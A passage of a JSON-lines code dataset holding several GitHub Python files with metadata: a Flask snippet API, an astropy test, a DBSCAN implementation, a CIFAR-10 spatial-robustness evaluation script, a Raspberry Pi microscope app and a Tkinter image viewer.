return send_from_directory(os.path.join(os.path.dirname(__file__), 'templates'), 'index1.html')\n\n@app.route('/get_all_files', methods=['GET'])\ndef get_all_files():\n # Create a session and query the database\n session = Session()\n query = session.query(CodeSnippet)\n\n # Fetch all code snippets\n results = query.all()\n\n # Organize the results in a list of dictionaries\n organized_data = []\n for result in results:\n organized_data.append({\n 'script_name': result.name,\n 'description': result.description,\n 'id': result.id,\n 'file_path': result.file_path,\n 'code': result.code,\n 'latest_commit': result.latest_commit\n })\n\n # Return JSON response\n return jsonify(organized_data)\n\n@app.route('/view_json')\ndef view_json():\n # Get the code snippets as a JSON string\n json_data = get_all_files().get_data(as_text=True)\n\n return render_template('view_json.html', json_data=json_data)\n\n\n\n\ndef run():\n app.run(debug=True, use_reloader=False)\n\n# Run Flask app\nif __name__ == '__main__':\n run()\n", "repo_name": "thepwnman33/Magicus", "sub_path": "apitest.py", "file_name": "apitest.py", "file_ext": "py", "file_size_in_byte": 3920, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 11, "usage_type": "call"}, {"api_name": "flask_cors.CORS", "line_number": 14, "usage_type": "call"}, {"api_name": "sqlalchemy.create_engine", "line_number": 24, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.sessionmaker", "line_number": 25, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 31, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 31, "usage_type": "name"}, {"api_name": "models_wrapper.CodeSnippet", "line_number": 35, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 45, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 51, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 51, "usage_type": "name"}, {"api_name": "models_wrapper.CodeSnippet", "line_number": 55, "usage_type": "argument"}, {"api_name": "sqlalchemy.or_", "line_number": 59, "usage_type": "call"}, {"api_name": "models_wrapper.CodeSnippet.name.contains", "line_number": 60, "usage_type": "call"}, {"api_name": "models_wrapper.CodeSnippet.name", "line_number": 60, "usage_type": "attribute"}, {"api_name": "models_wrapper.CodeSnippet", "line_number": 60, "usage_type": "name"}, {"api_name": "models_wrapper.CodeSnippet.description.contains", "line_number": 61, "usage_type": "call"}, {"api_name": "models_wrapper.CodeSnippet.description", "line_number": 61, "usage_type": "attribute"}, {"api_name": "models_wrapper.CodeSnippet", "line_number": 61, "usage_type": "name"}, {"api_name": "models_wrapper.CodeSnippet.code.contains", "line_number": 62, "usage_type": "call"}, {"api_name": "models_wrapper.CodeSnippet.code", "line_number": 62, "usage_type": "attribute"}, {"api_name": "models_wrapper.CodeSnippet", "line_number": 62, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 80, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 84, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 84, "usage_type": "name"}, {"api_name": "models_wrapper.CodeSnippet", "line_number": 86, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 88, "usage_type": "call"}, {"api_name": "flask.send_from_directory", "line_number": 92, "usage_type": "call"}, {"api_name": 
"os.path.join", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path", "line_number": 92, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 92, "usage_type": "call"}, {"api_name": "models_wrapper.CodeSnippet", "line_number": 98, "usage_type": "argument"}, {"api_name": "flask.jsonify", "line_number": 116, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 123, "usage_type": "call"}]} +{"seq_id": "30827508988", "text": "# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\nimport pytest\n\nfrom astropy import cosmology\nfrom astropy.cosmology import Cosmology\nfrom astropy.cosmology.core import _COSMOLOGY_CLASSES\nfrom astropy.table import QTable, vstack\nfrom astropy.utils.compat import optional_deps\nfrom astropy.utils.exceptions import AstropyUserWarning\n\n\nclass CosmologyWithKwargs(Cosmology):\n def __init__(self, name=\"cosmology with kwargs\", meta=None, **kwargs):\n super().__init__(name=name, meta=meta)\n\n\ncosmo_instances = [\n getattr(cosmology.realizations, name) for name in cosmology.parameters.available\n]\ncosmo_instances.append(CosmologyWithKwargs())\n\n\ndef teardown_module(module):\n # pop CosmologyWithKwargs from registered classes\n # but don't error b/c it fails in parallel\n _COSMOLOGY_CLASSES.pop(CosmologyWithKwargs.__qualname__, None)\n\n\n###############################################################################\n\n@pytest.mark.parametrize(\"expected\", cosmo_instances)\ndef test_to_from_mapping_instance(expected):\n # ------------\n # To Mapping\n params = expected.to_format('mapping')\n\n assert isinstance(params, dict)\n assert params[\"cosmology\"] is expected.__class__\n assert params[\"name\"] == expected.name\n\n # ------------\n # From Mapping\n params[\"mismatching\"] = \"will error\"\n\n # tests are different if the last argument is a **kwarg\n if tuple(expected._init_signature.parameters.values())[-1].kind == 4:\n got = Cosmology.from_format(params, format=\"mapping\")\n\n assert got.__class__ == expected.__class__\n assert got.name == expected.name\n assert \"mismatching\" not in got.meta\n\n return # don't continue testing\n\n # read with mismatching parameters errors\n with pytest.raises(TypeError, match=\"there are unused parameters\"):\n Cosmology.from_format(params, format=\"mapping\")\n\n # unless mismatched are moved to meta\n got = Cosmology.from_format(params, format=\"mapping\", move_to_meta=True)\n assert got.__class__ == expected.__class__\n assert got == expected\n assert got.meta[\"mismatching\"] == \"will error\"\n\n # it won't error if everything matches up\n params.pop(\"mismatching\")\n got = Cosmology.from_format(params, format=\"mapping\")\n assert got.__class__ == expected.__class__\n assert got == expected\n\n # and it will also work if the cosmology is a string\n params[\"cosmology\"] = params[\"cosmology\"].__name__\n got = Cosmology.from_format(params, format=\"mapping\")\n assert got == expected\n\n # also it auto-identifies 'format'\n got = Cosmology.from_format(params)\n assert got == expected\n", "repo_name": "CNwangbin/astropy", "sub_path": "astropy/cosmology/io/tests/test_mapping.py", "file_name": "test_mapping.py", "file_ext": "py", "file_size_in_byte": 2649, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "53", "api": [{"api_name": "astropy.cosmology.Cosmology", "line_number": 13, "usage_type": "name"}, {"api_name": "astropy.cosmology.realizations", "line_number": 19, "usage_type": "attribute"}, 
{"api_name": "astropy.cosmology", "line_number": 19, "usage_type": "name"}, {"api_name": "astropy.cosmology.parameters", "line_number": 19, "usage_type": "attribute"}, {"api_name": "astropy.cosmology.core._COSMOLOGY_CLASSES.pop", "line_number": 27, "usage_type": "call"}, {"api_name": "astropy.cosmology.core._COSMOLOGY_CLASSES", "line_number": 27, "usage_type": "name"}, {"api_name": "astropy.cosmology.Cosmology.from_format", "line_number": 48, "usage_type": "call"}, {"api_name": "astropy.cosmology.Cosmology", "line_number": 48, "usage_type": "name"}, {"api_name": "pytest.raises", "line_number": 57, "usage_type": "call"}, {"api_name": "astropy.cosmology.Cosmology.from_format", "line_number": 58, "usage_type": "call"}, {"api_name": "astropy.cosmology.Cosmology", "line_number": 58, "usage_type": "name"}, {"api_name": "astropy.cosmology.Cosmology.from_format", "line_number": 61, "usage_type": "call"}, {"api_name": "astropy.cosmology.Cosmology", "line_number": 61, "usage_type": "name"}, {"api_name": "astropy.cosmology.Cosmology.from_format", "line_number": 68, "usage_type": "call"}, {"api_name": "astropy.cosmology.Cosmology", "line_number": 68, "usage_type": "name"}, {"api_name": "astropy.cosmology.Cosmology.from_format", "line_number": 74, "usage_type": "call"}, {"api_name": "astropy.cosmology.Cosmology", "line_number": 74, "usage_type": "name"}, {"api_name": "astropy.cosmology.Cosmology.from_format", "line_number": 78, "usage_type": "call"}, {"api_name": "astropy.cosmology.Cosmology", "line_number": 78, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 32, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 32, "usage_type": "attribute"}]} +{"seq_id": "9261746599", "text": "# DBSCAN聚类\r\nfrom sklearn import datasets\r\nimport numpy as np\r\nimport random\r\nimport matplotlib.pyplot as plt\r\nimport time\r\nimport copy\r\ndef find_neighbor(j, x, eps):\r\n N = list()\r\n for i in range(x.shape[0]):\r\n # 计算欧式距离\r\n temp = np.sqrt(np.sum(np.square(x[j] - x[i])))\r\n if temp <= eps:\r\n N.append(i)\r\n return set(N)\r\ndef DBSCAN(X, eps, min_Pts):\r\n k = -1\r\n neighbor_list = [] # 用来保存每个数据的邻域\r\n omega_list = [] # 核心对象集合\r\n # 初始时将所有点标记为未访问\r\n gama = set([x for x in range(len(X))])\r\n cluster = [-1 for _ in range(len(X))] # 聚类\r\n for i in range(len(X)):\r\n neighbor_list.append(find_neighbor(i, X, eps))\r\n if len(neighbor_list[-1]) >= min_Pts:\r\n # 将样本加入核心对象集合\r\n omega_list.append(i)\r\n # 转化为集合便于操作\r\n omega_list = set(omega_list)\r\n while len(omega_list) > 0:\r\n gama_old = copy.deepcopy(gama)\r\n # 随机选取一个核心对象\r\n j = random.choice(list(omega_list))\r\n k = k + 1\r\n Q = list()\r\n Q.append(j)\r\n gama.remove(j)\r\n while len(Q) > 0:\r\n q = Q[0]\r\n Q.remove(q)\r\n if len(neighbor_list[q]) >= min_Pts:\r\n delta = neighbor_list[q] &gama\r\n deltalist = list(delta)\r\n for i in range(len(delta)):\r\n Q.append(deltalist[i])\r\n gama = gama - delta\r\n Ck = gama_old - gama\r\n Cklist = list(Ck)\r\n for i in range(len(Ck)):\r\n cluster[Cklist[i]] = k\r\n omega_list = omega_list - Ck\r\n return cluster\r\nX1, y1 = datasets.make_circles(n_samples=2000, factor=.6, noise=.02)\r\nX2, y2 = datasets.make_blobs(n_samples=400, n_features=2, centers=[[1.2, 1.2]], cluster_std=[[.1]], random_state=9)\r\nX = np.concatenate((X1, X2))\r\neps = 0.08\r\nmin_Pts = 10\r\nbegin = time.time()\r\nC = DBSCAN(X, eps, min_Pts)\r\nend = time.time()\r\nplt.figure()\r\nplt.scatter(X[:, 0], X[:, 1], c=C)\r\nplt.show()", "repo_name": "HuichuanLI/play_with_machine_learning_book", 
"sub_path": "一些经典的机器学习的实现/DBSCAN.py", "file_name": "DBSCAN.py", "file_ext": "py", "file_size_in_byte": 2099, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.sqrt", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 12, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 31, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 33, "usage_type": "call"}, {"api_name": "sklearn.datasets.make_circles", "line_number": 53, "usage_type": "call"}, {"api_name": "sklearn.datasets", "line_number": 53, "usage_type": "name"}, {"api_name": "sklearn.datasets.make_blobs", "line_number": 54, "usage_type": "call"}, {"api_name": "sklearn.datasets", "line_number": 54, "usage_type": "name"}, {"api_name": "numpy.concatenate", "line_number": 55, "usage_type": "call"}, {"api_name": "time.time", "line_number": 58, "usage_type": "call"}, {"api_name": "time.time", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 61, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 62, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 63, "usage_type": "name"}]} +{"seq_id": "34177809772", "text": "from __future__ import print_function\nimport os\nimport itertools\nimport re\nimport argparse\nimport logging\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom datasets import SemiSupervisedDataset, DATASETS\nfrom torchvision import transforms\nimport torch.backends.cudnn as cudnn\nfrom utils import get_model\nimport spatial\nimport json\n\nNUM_ROT = 31\nNUM_TRANS = 5\n\nuse_cuda = torch.cuda.is_available()\ndevice = torch.device(\"cuda\" if use_cuda else \"cpu\")\n\n\ndef transform(x, rotation, translation):\n assert x.shape[1] == 3\n\n with torch.no_grad():\n translated = spatial.transform(x, rotation, translation)\n\n return translated\n\n\ndef get_spatial_adv_example(model, X, y, max_rot=30, max_trans=0.1071):\n\n def calc_correct(inp):\n output = model(inp)\n targets = y.repeat([inp.shape[0]])\n return (output.argmax(dim=1) == targets).long()\n\n with torch.no_grad():\n rots = torch.linspace(-max_rot, max_rot, steps=NUM_ROT)\n trans = torch.linspace(-max_trans, max_trans, steps=NUM_TRANS)\n tfms = torch.tensor(list(itertools.product(rots, trans, trans))).cuda(device=device)\n all_rots = tfms[:, 0]\n all_trans = tfms[:, 1:]\n\n ntfm = all_rots.shape[0]\n transformed = transform(X.repeat([ntfm, 1, 1, 1]), all_rots, all_trans)\n torch.clamp(transformed, 0, 1.0)\n\n # X_pgd = Variable(torch.zeros(X.data.shape), requires_grad=True)\n MAX_BS = 128\n i = 0\n while i < ntfm:\n to_do = transformed[i:i+MAX_BS]\n is_correct = calc_correct(to_do)\n argmin = is_correct.argmin()\n if is_correct[argmin] == 0:\n return transformed[i+argmin:i+argmin+1].squeeze_(0)\n\n i += MAX_BS\n else:\n return transformed[0:1].squeeze_(0)\n\n\ndef apply(func, M):\n tList = [func(m) for m in torch.unbind(M, dim=0)]\n return torch.stack(tList, dim=0)\n\n\ndef get_batch_spatial_adv_example(model, X, y, max_rot=30, max_trans=0.1071, random=False, wo10=False):\n def calc_correct(inp):\n output 
= model(inp)\n return (output.argmax(dim=1) == y).long()\n\n if random:\n bs = X.shape[0]\n rots = spatial.unif((bs,), -max_rot, max_rot)\n txs = spatial.unif((bs, 2), -max_trans, max_trans)\n transformed = transform(X, rots, txs)\n return transformed\n\n elif wo10:\n all_transformed = []\n all_is_corrects = []\n for i in range(10):\n bs = X.shape[0]\n rots = spatial.unif((bs,), -max_rot, max_rot)\n txs = spatial.unif((bs, 2), -max_trans, max_trans)\n transformed = transform(X, rots, txs)\n all_transformed.append(transformed)\n all_is_corrects.append(calc_correct(transformed))\n aic = torch.stack(all_is_corrects, dim=0).argmin(dim=0)\n all_transformed = torch.stack(all_transformed, dim=0)\n X_pgd = []\n for j, i in enumerate(torch.unbind(aic, dim=0)):\n X_pgd.append(all_transformed[i, j])\n X_pgd = torch.stack(X_pgd, dim=0)\n return X_pgd\n else:\n # otherwise grid\n X_pgd = []\n for cur_x, cur_y in zip(torch.unbind(X, dim=0), torch.unbind(y, dim=0)):\n X_pgd.append(get_spatial_adv_example(model, cur_x, cur_y, max_rot, max_trans))\n X_pgd = torch.stack(X_pgd, dim=0)\n return X_pgd\n\n\ndef pgd_whitebox_spatial(model, X, y, max_rot=30, max_trans=0.1071, random=False, eval=False):\n wo10 = (not random and not eval)\n X_pgd = get_batch_spatial_adv_example(model, X, y, max_rot, max_trans, random=random, wo10=wo10)\n err = (model(X).data.max(1)[1] != y.data).float().sum()\n err_pgd = (model(X_pgd).data.max(1)[1] != y.data).float().sum()\n return err, err_pgd\n\n\ndef eval_adv_test_whitebox_spatial(model, device, test_loader):\n \"\"\"\n evaluate model by white-box attack\n \"\"\"\n model.eval()\n robust_err_total = 0\n natural_err_total = 0\n total = 0\n\n for data, target, unsup in test_loader:\n data, target = data.to(device), target.to(device)\n # pgd attack\n X, y = Variable(data, requires_grad=True), Variable(target)\n err_natural, err_robust = pgd_whitebox_spatial(model, X, y,\n max_rot=args.max_rot,\n max_trans=args.max_trans,\n eval=True)\n logging.info('err pgd (white-box): %g', err_robust.item())\n robust_err_total += err_robust\n natural_err_total += err_natural\n total += X.shape[0]\n natural_acc = 1.0 - (natural_err_total.item() / total)\n robust_acc = 1.0 - (robust_err_total.item() / total)\n logging.info(f'natural_accuracy: {natural_acc}')\n logging.info(f'robust_accuracy: {robust_acc}')\n stats = {'natural_accuracy': natural_acc, 'robust_accuracy': robust_acc}\n with open(os.path.join(output_dir, 'stats.json'), 'w') as outfile:\n json.dump(stats, outfile)\n\n\ndef main():\n # white-box attack\n logging.info('pgd white-box attack')\n checkpoint = torch.load(args.model_path)\n state_dict = checkpoint.get('state_dict', checkpoint)\n num_classes = checkpoint.get('num_classes', 10)\n normalize_input = checkpoint.get('normalize_input', False)\n model = get_model(args.model, num_classes=num_classes,\n normalize_input=normalize_input)\n if not all([k.startswith('module') for k in state_dict]):\n state_dict = {'module.' 
+ k: v for k, v in state_dict.items()}\n if use_cuda:\n model = torch.nn.DataParallel(model).cuda()\n cudnn.benchmark = True\n model.load_state_dict(state_dict)\n\n eval_adv_test_whitebox_spatial(model, device, test_loader)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='PyTorch CIFAR Spatial Attack Evaluation')\n parser.add_argument('--dataset', type=str, default='cifar10',\n choices=DATASETS,\n help='The dataset')\n parser.add_argument('--test-batch-size', type=int, default=200, metavar='N',\n help='input batch size for testing (default: 200)')\n parser.add_argument('--no-cuda', action='store_true', default=False,\n help='disables CUDA training')\n parser.add_argument('--max-rot', default=30, type=int, help='rotation angle')\n parser.add_argument('--max-trans', default=0.1071, type=float, help='translation')\n parser.add_argument('--num-steps', default=20,\n help='perturb number of steps')\n parser.add_argument('--step-size', default=0.003, type=float,\n help='perturb step size')\n parser.add_argument('--model-path',\n default='./checkpoints/model_cifar_wrn.pt',\n help='model for white-box attack evaluation')\n parser.add_argument('--white-box-attack', default=True,\n help='whether perform white-box attack')\n parser.add_argument('--model', '-m', default='wrn-34-10', type=str,\n help='name of the model')\n parser.add_argument('--output-suffix', '-o', default='', type=str,\n help='string to add to log filename')\n\n args = parser.parse_args()\n\n output_dir, checkpoint_name = os.path.split(args.model_path)\n epoch = int(re.search('epoch(\\d+)', checkpoint_name).group(1))\n\n logging.basicConfig(\n level=logging.INFO,\n format=\"%(asctime)s | %(message)s\",\n handlers=[\n logging.FileHandler(os.path.join(output_dir,\n 'attack_epoch%d%s.log' %\n (epoch, args.output_suffix))),\n logging.StreamHandler()\n ])\n logger = logging.getLogger()\n\n logging.info('PGD attack')\n logging.info('Args: %s', args)\n\n # settings\n use_cuda = not args.no_cuda and torch.cuda.is_available()\n device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n kwargs = {'num_workers': 1, 'pin_memory': True} if use_cuda else {}\n\n # set up data loader\n transform_test = transforms.Compose([transforms.ToTensor(), ])\n # testset = torchvision.datasets.CIFAR10(root='data', train=False,\n # download=True,\n # transform=transform_test)\n testset = SemiSupervisedDataset(base_dataset=args.dataset,\n train=False, root='data',\n download=True,\n transform=transform_test)\n test_loader = torch.utils.data.DataLoader(testset,\n batch_size=args.test_batch_size,\n shuffle=False, **kwargs)\n\n main()\n\n", "repo_name": "p-lambda/robust_tradeoff", "sub_path": "cifar/code/spatial_attack_cifar10.py", "file_name": "spatial_attack_cifar10.py", "file_ext": "py", "file_size_in_byte": 8863, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.cuda.is_available", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 20, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 27, "usage_type": "call"}, {"api_name": "spatial.transform", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.linspace", "line_number": 41, "usage_type": "call"}, {"api_name": "torch.linspace", "line_number": 42, "usage_type": "call"}, {"api_name": 
"torch.tensor", "line_number": 43, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.clamp", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.unbind", "line_number": 67, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 68, "usage_type": "call"}, {"api_name": "spatial.unif", "line_number": 78, "usage_type": "call"}, {"api_name": "spatial.unif", "line_number": 79, "usage_type": "call"}, {"api_name": "spatial.unif", "line_number": 88, "usage_type": "call"}, {"api_name": "spatial.unif", "line_number": 89, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 93, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 94, "usage_type": "call"}, {"api_name": "torch.unbind", "line_number": 96, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 98, "usage_type": "call"}, {"api_name": "torch.unbind", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 105, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 129, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 134, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 140, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 141, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 143, "usage_type": "call"}, {"api_name": "os.path", "line_number": 143, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 144, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 149, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 150, "usage_type": "call"}, {"api_name": "utils.get_model", "line_number": 154, "usage_type": "call"}, {"api_name": "torch.nn.DataParallel", "line_number": 159, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 159, "usage_type": "attribute"}, {"api_name": "torch.backends.cudnn.benchmark", "line_number": 160, "usage_type": "attribute"}, {"api_name": "torch.backends.cudnn", "line_number": 160, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 167, "usage_type": "call"}, {"api_name": "datasets.DATASETS", "line_number": 170, "usage_type": "name"}, {"api_name": "os.path.split", "line_number": 194, "usage_type": "call"}, {"api_name": "os.path", "line_number": 194, "usage_type": "attribute"}, {"api_name": "re.search", "line_number": 195, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 197, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 198, "usage_type": "attribute"}, {"api_name": "logging.FileHandler", "line_number": 201, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 201, "usage_type": "call"}, {"api_name": "os.path", "line_number": 201, "usage_type": "attribute"}, {"api_name": "logging.StreamHandler", "line_number": 204, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 206, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 208, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 209, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 212, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 212, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 213, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 217, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 217, 
"usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 217, "usage_type": "call"}, {"api_name": "datasets.SemiSupervisedDataset", "line_number": 221, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 225, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 225, "usage_type": "attribute"}]} +{"seq_id": "22307824379", "text": "from __future__ import print_function\nfrom PIL import Image, ImageTk\nimport tkinter as tki\nimport threading\nimport cv2\nimport os, time\nimport picamera\nimport picamera.array \n\nclass MicroscopeApp:\n def __init__(self, picam, pibgr):\n # store the video stream object and output path, then initialize\n # the most recently read frame, thread for reading frames, and\n # the thread stop event\n self.picam = picam\n self.frame = None\n self.thread = None\n self.stopEvent = None\n self.pibgr = pibgr\n\n # initialize the root window and image panel\n self.root = tki.Tk()\n self.panel = None\n \n # create a button, that when pressed, will take the current\n # frame and save it to file\n btn = tki.Button(self.root, text=\"Snapshot!\", command=self.takeSnapshot)\n btn.pack(side=\"bottom\", fill=\"both\", expand=\"yes\", padx=10, pady=10)\n \n # start a thread that constantly pools the video sensor for\n # the most recently read frame\n self.stopEvent = threading.Event()\n self.thread = threading.Thread(target=self.videoLoop, args=())\n self.thread.start()\n \n # set a callback to handle when the window is closed\n self.root.wm_title(\"Microscope imaging\")\n self.root.wm_protocol(\"WM_DELETE_WINDOW\", self.onClose)\n\n def videoLoop(self):\n while not self.stopEvent.is_set():\n # grab the frame from the video stream and resize it\n self.picam.capture(self.pibgr, \"bgr\", use_video_port = \"True\")\n self.frame = self.pibgr.array\n frame_small = cv2.resize(self.frame, (420,300))\n \n # clear buffer(if not it occurs incorrect error)\n self.pibgr.truncate(0)\n \n image = Image.fromarray(frame_small)\n image = ImageTk.PhotoImage(image)\n\n # if the panel is not None, we need to initialize it\n if self.panel is None:\n self.panel = tki.Label(image=image)\n self.panel.image = image\n self.panel.pack(side=\"left\", padx=10, pady=10)\n \n # otherwise, simply update the panel\n else:\n self.panel.configure(image=image)\n self.panel.image = image \n\n def takeSnapshot(self):\n timestr = time.strftime(\"%Y%m%d_%H%M%S\");\n filename = \"microscope_{}.tiff\".format(timestr)\n cv2.imwrite(filename, self.frame)\n print(\"[INFO] saved {}\".format(filename))\n\n def onClose(self):\n # set the stop event, cleanup the camera, and allow the rest of\n # the quit process to continue\n print(\"[INFO] closing...\")\n self.stopEvent.set() \n self.root.quit() \n\nif __name__ == '__main__':\n \n # initialize the video stream and allow the camera sensor to warmup\n print(\"[INFO] warming up camera...\")\n picam = picamera.PiCamera()\n time.sleep(0.5)\n picam.resolution = (1640,1232)\n time.sleep(2)\n pibgr = picamera.array.PiRGBArray(picam)\n time.sleep(0.5)\n\n # start the app\n pba = MicroscopeApp(picam,pibgr)\n pba.root.mainloop()", "repo_name": "OISL-Yonsei/raspberrypi-cam", "sub_path": "microscope.py", "file_name": "microscope.py", "file_ext": "py", "file_size_in_byte": 3165, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "tkinter.Tk", "line_number": 22, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 27, 
"usage_type": "call"}, {"api_name": "threading.Event", "line_number": 32, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 33, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 45, "usage_type": "call"}, {"api_name": "PIL.Image.fromarray", "line_number": 50, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 50, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 51, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 51, "usage_type": "name"}, {"api_name": "tkinter.Label", "line_number": 55, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 65, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 67, "usage_type": "call"}, {"api_name": "picamera.PiCamera", "line_number": 81, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 82, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 84, "usage_type": "call"}, {"api_name": "picamera.array.PiRGBArray", "line_number": 85, "usage_type": "call"}, {"api_name": "picamera.array", "line_number": 85, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 86, "usage_type": "call"}]} +{"seq_id": "35681261486", "text": "from tkinter import *\r\nfrom PIL import ImageTk, Image\r\n\r\nroot = Tk()\r\nimg1 = ImageTk.PhotoImage(Image.open(\"a.png\"))\r\nimg2 = ImageTk.PhotoImage(Image.open(\"b.png\"))\r\nimg3 = ImageTk.PhotoImage(Image.open(\"c.png\"))\r\nimg4 = ImageTk.PhotoImage(Image.open(\"d.png\"))\r\nimg5 = ImageTk.PhotoImage(Image.open(\"e.png\"))\r\nimg_list = [img1, img2, img3, img4, img5]\r\nimage_num = 0\r\ndef forward():\r\n global imageLabel, image_num, img_list\r\n image_num = image_num + 1\r\n print(f\"{image_num}\")\r\n if image_num == (len(img_list)):\r\n forward_btn = Button(root, text=\">>\", command=forward, state=DISABLED)\r\n forward_btn.grid(row=1, column=2)\r\n else:\r\n imageLabel.grid_forget()\r\n imageLabel = Label(root, image=img_list[image_num])\r\n forward_btn = Button(root, text=\">>\", command=forward)\r\n forward_btn.grid(row=1, column=2)\r\n imageLabel.grid(row=0, column=0, columnspan=3)\r\n\r\n\r\ndef back():\r\n global imageLabel, image_num, img_list\r\n if image_num<=0:\r\n back_btn = Button(root, text=\"<<\", command=back,state=DISABLED)\r\n back_btn.grid(row=1, column=0)\r\n else:\r\n imageLabel.grid_forget()\r\n image_num -= 1\r\n imageLabel = Label(root, image=img_list[image_num])\r\n forward_btn = Button(root, text=\">>\", command=forward)\r\n forward_btn.grid(row=1, column=2)\r\n imageLabel.grid(row=0, column=0, columnspan=3)\r\n\r\n\r\nimageLabel = Label(root, image=img_list[image_num])\r\nback_btn = Button(root, text=\"<<\", command=back)\r\nforward_btn = Button(root, text=\">>\", command=forward)\r\n\r\nimageLabel.grid(row=0, column=0, columnspan=3)\r\nback_btn.grid(row=1, column=0)\r\nforward_btn.grid(row=1, column=2)\r\nroot.mainloop()", "repo_name": "rayyan-24/Python-Resources", "sub_path": "Tkinter/7_image_viewer.py", "file_name": "7_image_viewer.py", "file_ext": "py", "file_size_in_byte": 1701, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "PIL.ImageTk.PhotoImage", "line_number": 5, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 5, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 5, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 5, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 6, 
